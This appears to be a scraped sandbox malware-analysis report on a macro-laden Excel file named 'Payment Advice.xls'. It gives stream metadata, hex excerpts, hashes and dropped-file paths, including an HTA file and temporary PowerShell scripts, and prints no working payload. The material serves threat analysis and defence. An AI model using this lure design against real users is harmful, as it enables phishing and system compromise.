Preview:	L......g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........T....c:\Users\user\AppData\Local\Temp\f2dj0ncr\CSC6208178C473A4F0793DCFE56B934F534.TMP................e...G....*..............4.......C:\Users\user\AppData\Local\Temp\RES19C8.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...f.2.d.j.0.n.c.r...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.

Process:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regbrowsers.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

File type:	Composite Document File V2 Document, Little Endian, Os: Windows, Version 6.2, Code page: 1252, Name of Creating Application: Microsoft Excel, Create Time/Date: Sat Sep 16 01:00:00 2006, Last Saved Time/Date: Fri Oct 25 05:31:16 2024, Security: 1
Entropy (8bit):	7.343592395581285
TrID:	Microsoft Excel sheet (30009/1) 47.99% Microsoft Excel sheet (alternate) (24509/1) 39.20% Generic OLE2 / Multistream Compound File (8008/1) 12.81%
File name:	Payment Advice.xls
File size:	1'081'344 bytes
MD5:	e7b0128fdc780e228be72adbed8765c4
SHA1:	4a7456b2d6422c33f8f7aafa302cd43c8d2d5033
SHA256:	c03299410145508191967d0544203e1aed4fc9886b7b11d6d4f05500d002a786
SHA512:	da2da848812a40e02e547f6c047baa345492839ac322965721c1988ba862ae3535edb1f9928359db9d64df4eacfd0bcf4e412eaa762cb88e712f2d8b5a56f5b8
SSDEEP:	12288:nmzHJEyfN1Y1uBPj39wZE8D3DERnLRmF8D6IHf8wh9HN8zFykCGrqD:uhfg14318bARM8FH/hX85yhz
TLSH:	B835AED3AA198F66ED560230A6F3876E5324CC83C522472F22F4772839F7794255AF8D
File Content Preview:	........................>.......................................................................7...............................c.......e......................................................................................................................

Has Summary Info:
Application Name:	Microsoft Excel
Encrypted Document:	True
Contains Word Document Stream:	False
Contains Workbook/Book Stream:	True
Contains PowerPoint Document Stream:	False
Contains Visio Document Stream:	False
Contains ObjectPool Stream:	False
Flash Objects Count:	0
Contains VBA Macros:	True

Code Page:	1252
Author:
Last Saved By:
Create Time:	2006-09-16 00:00:00
Last Saved Time:	2024-10-25 04:31:16
Creating Application:	Microsoft Excel
Security:	1

Document Code Page:	1252
Thumbnail Scaling Desired:	False
Contains Dirty Links:	False
Shared Document:	False
Changed Hyperlinks:	False
Application Version:	786432

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet1
VBA File Name:	Sheet1.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . - . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 43 d6 ad 2d 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet2
VBA File Name:	Sheet2.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . - .
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 43 d6 ec 1a 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/Sheet3
VBA File Name:	Sheet3.cls
Stream Size:	977
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C G t . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 2 . 0 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 43 d6 47 74 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	_VBA_PROJECT_CUR/VBA/ThisWorkbook
VBA File Name:	ThisWorkbook.cls
Stream Size:	985
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . C . . . . # . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M E . . . . . . . . . . . . . . . . . . . . . . . ( . . . . . S L . . . . S . . . . . S . . . . . < . . . . . . . . . . N . 0 . { . 0 . 0 . 0 . 2 . 0 . 8 . 1 . 9 . -
Data Raw:	01 16 01 00 00 f0 00 00 00 c4 02 00 00 d4 00 00 00 00 02 00 00 ff ff ff ff cb 02 00 00 1f 03 00 00 00 00 00 00 01 00 00 00 43 d6 2e 12 00 00 ff ff 23 01 00 00 88 00 00 00 b6 00 ff ff 01 01 00 00 00 00 ff ff ff ff 00 00 00 00 ff ff ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.889430592781307
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . S h e e t 1 . . . . . S h e e t 2 . . . . . S h e e t 3 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00 78 00 00 00 0c 00 00 00 a1 00 00 00 02 00 00 00 e4 04 00 00

General
Stream Path:	\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	200
Entropy:	3.2603503175049817
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . . . . . . . . . . . . @ . . . . . . . H . . . . . . . T . . . . . . . ` . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . \| . # . @ . . . . . & . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 98 00 00 00 07 00 00 00 01 00 00 00 40 00 00 00 04 00 00 00 48 00 00 00 08 00 00 00 54 00 00 00 12 00 00 00 60 00 00 00 0c 00 00 00 78 00 00 00 0d 00 00 00 84 00 00 00 13 00 00 00 90 00 00 00 02 00 00 00 e4 04 00 00 1e 00 00 00 04 00 00 00

General
Stream Path:	MBD000EF6BE/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD000EF6BE/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	244
Entropy:	2.701136490257069
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , 0 . . . . . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . l . . . . . . . t . . . . . . . \| . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . F e u i l 1 . . . . . . . . . . . . . . . . . W o r k s h e e t s . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 30 00 00 00 c4 00 00 00 09 00 00 00 01 00 00 00 50 00 00 00 0f 00 00 00 58 00 00 00 17 00 00 00 64 00 00 00 0b 00 00 00 6c 00 00 00 10 00 00 00 74 00 00 00 13 00 00 00 7c 00 00 00 16 00 00 00 84 00 00 00 0d 00 00 00 8c 00 00 00 0c 00 00 00 9f 00 00 00

General
Stream Path:	MBD000EF6BE/\x5SummaryInformation
CLSID:
File Type:	dBase III DBT, version number 0, next free block index 65534, 1st item "\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377\377"
Stream Size:	90976
Entropy:	4.0202822243037755
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . 0 c . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . p . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . M i c r o s o f t E x c e l . @ . . . . ; { ) . @ . . . . Z % . } . @ . . . . . % . . . . . . . . . G . . . t b . . . . . . . . u . 2 . . . . . . . . . 2 . . . . ! . . . . . . . . . . v . . . ! . . A . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 30 63 01 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 70 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00

General
Stream Path:	MBD000EF6BE/MBD0002578E/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD000EF6BE/MBD0002578E/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	33181
Entropy:	7.705040299215262
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . ) ; . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 e2 9b 29 3b aa 01 00 00 e0 07 00 00 13 00 ce 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 ca 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD000EF6BE/MBD00032715/\x1CompObj
CLSID:
File Type:	data
Stream Size:	99
Entropy:	3.631242196770981
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Payment Advice.xls

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Yara Signatures

PCAP (Network Traffic)

Memory Dumps

Sigma Signatures

System Summary

Data Obfuscation

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\seethebestthingsevermeetwithgreatthingstobegood[1].hta

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\logisticthingswithgoodthingsgivenbest[1].tiff

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\1C3ABE4C.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\33E4563A.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\6C39F1DD.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\73203679.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\89D7CF3.emf

C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.MSO\D63E37B7.emf

C:\Users\user\AppData\Local\Temp\1gnxtwym.xfa.psm1

C:\Users\user\AppData\Local\Temp\21rgtxet.q1w.ps1

C:\Users\user\AppData\Local\Temp\RES19C8.tmp

C:\Users\user\AppData\Local\Temp\RES6651.tmp

Windows Analysis Report
Payment Advice.xls

General
Stream Path:	MBD000EF6BE/MBD00032715/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	38341
Entropy:	7.85773182578822
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . D . 2 . . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 44 19 a7 ee 32 01 00 00 c9 02 00 00 13 00 08 02 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 04 02 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD000EF6BE/MBD00032B6D/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.25248375192737
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . F & . . . M i c r o s o f t O f f i c e E x c e l 2 0 0 3 W o r k s h e e t . . . . . B i f f 8 . . . . . E x c e l . S h e e t . 8 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 20 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 26 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 32 30 30 33 20 57 6f 72 6b 73 68 65 65 74 00 06 00 00 00 42 69 66 66 38 00 0e 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 38 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD000EF6BE/MBD00032B6D/\x5DocumentSummaryInformation
CLSID:
File Type:	data
Stream Size:	484
Entropy:	3.922883556049869
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . + , D . . . . . . . . . . + , D . . . . . . . . . . . . . . . H . . . . . . . P . . . . . . . X . . . . . . . ` . . . . . . . h . . . . . . . p . . . . . . . x . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . I N V . . . . . P L . . . . . D P L - 1 . . . . . I N V ! P r i n t _ A r e a . . . . . P L ! P r i n t _ A r e a . . . . . . . . . . . . . . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 00 00 00 05 d5 cd d5 9c 2e 1b 10 93 97 08 00 2b 2c f9 ae 44 01 00 00 00 01 00 00 08 00 00 00 01 00 00 00 48 00 00 00 17 00 00 00 50 00 00 00 0b 00 00 00 58 00 00 00 10 00 00 00 60 00 00 00 13 00 00 00 68 00 00 00 16 00 00 00 70 00 00 00 0d 00 00 00

General
Stream Path:	MBD000EF6BE/MBD00032B6D/\x5SummaryInformation
CLSID:
File Type:	data
Stream Size:	19956
Entropy:	3.047871976270467
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . O h . . . + ' 0 . . . M . . . . . . . . . . P . . . . . . . X . . . . . . . d . . . . . . . t . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . y d t . . . . . . . . . 9 1 9 7 4 . . . . . . . . . . . W P S O f f i c e . . @ . . . . E . w . @ . . . . . 2 . @ . . . . . . . % . . . . . . . . . G . . . . M . . . . . . . . ? . . . . . . . . . \| & . . . . . . . . . . . . . . & . . . " W M F C . . . .
Data Raw:	fe ff 00 00 06 02 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 e0 85 9f f2 f9 4f 68 10 ab 91 08 00 2b 27 b3 d9 30 00 00 00 c4 4d 00 00 09 00 00 00 01 00 00 00 50 00 00 00 04 00 00 00 58 00 00 00 08 00 00 00 64 00 00 00 12 00 00 00 74 00 00 00 0b 00 00 00 88 00 00 00 0c 00 00 00 94 00 00 00 0d 00 00 00 a0 00 00 00 13 00 00 00 ac 00 00 00 11 00 00 00 b4 00 00 00

General
Stream Path:	MBD000EF6BE/MBD00032B6D/Workbook
CLSID:
File Type:	Applesoft BASIC program data, first line number 16
Stream Size:	95624
Entropy:	3.890268972586762
Base64 Encoded:	True
Data ASCII:	. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . 9 1 9 7 4 B . . . . a . . . . . . . . = . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . . . Q \| 9 . . . . . . . X . @ . . . . . . . . . . " . . . . . . . . . . . .
Data Raw:	09 08 10 00 00 06 05 00 ab 1f cd 07 c9 00 02 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 05 00 00 39 31 39 37 34 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20

General
Stream Path:	MBD000EF6BE/MBD00033186/\x1CompObj
CLSID:
File Type:	data
Stream Size:	114
Entropy:	4.219515110876372
Base64 Encoded:	False
Data ASCII:	. . . . . . 0 . . . . . . . . . . . . . F ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . E x c e l . S h e e t . 1 2 . 9 q . . . . . . . . . . . .
Data Raw:	01 00 fe ff 03 0a 00 00 ff ff ff ff 30 08 02 00 00 00 00 00 c0 00 00 00 00 00 00 46 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 0f 00 00 00 45 78 63 65 6c 2e 53 68 65 65 74 2e 31 32 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD000EF6BE/MBD00033186/Package
CLSID:
File Type:	Microsoft Excel 2007+
Stream Size:	52190
Entropy:	7.870757596146126
Base64 Encoded:	True
Data ASCII:	P K . . . . . . . . . . ! . . p @ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
Data Raw:	50 4b 03 04 14 00 06 00 08 00 00 00 21 00 13 70 40 80 a3 01 00 00 e2 05 00 00 13 00 cf 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 cb 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD000EF6BE/MBD0018D4CE/\x1Ole
CLSID:
File Type:	data
Stream Size:	20
Entropy:	0.5689955935892812
Base64 Encoded:	False
Data ASCII:	. . . . . . . . . . . . . . . . . . . .
Data Raw:	01 00 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00

General
Stream Path:	MBD000EF6BE/MBD0018D4CE/\x3ObjInfo
CLSID:
File Type:	data
Stream Size:	4
Entropy:	0.8112781244591328
Base64 Encoded:	False
Data ASCII:	. . . .
Data Raw:	00 00 03 00

General
Stream Path:	MBD000EF6BE/MBD0018D4CE/Contents
CLSID:
